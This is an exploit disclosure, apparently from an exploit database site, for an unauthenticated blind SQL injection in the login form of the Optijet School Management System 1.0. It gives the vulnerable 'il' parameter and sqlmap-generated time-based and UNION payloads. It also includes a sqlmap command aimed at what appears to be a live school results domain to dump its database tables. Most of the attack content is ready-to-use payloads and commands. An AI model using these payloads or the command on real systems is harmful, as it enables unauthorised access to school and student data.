Optijet School Management System - Blind SQL Injection (Unauthenticated)

2021.10.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Optijet School Management System 1.0 - SQL Injection (Unauthenticated) # Date: 19.10.2021 # Exploit Author: MaliciousFolder # Vendor Homepage: http://optijet.net/optijet/index.php?r=kalan # Version: 1.0 # Tested on: Windows 10 - Ubuntu 20.04.3 LTS # Vulnerable Parameter: "il" Optijet, a school management system in Turkey, has SQL injection vulnerability on login forms. PoC: "il" parameter on http://localhost/index.php: il=0&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F Has SQLi injection, and here is the SQLMAP result: sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests: --- Parameter: il (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: il=0 AND (SELECT 6460 FROM (SELECT(SLEEP(5)))LyGV)&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: il=0 UNION ALL SELECT CONCAT(0x717a627171,0x46774f754d596e6e666d4a71646468726f4a785250754e4d557441416862555344647a6542765a69,0x7176627871),NULL,NULL,NULL-- -&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F --- SQLMAP Command to retrieve tables from DB: sqlmap.py -u okulpedia.okulsonuc.com --forms --tables


Vote for this issue:
70%
30%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top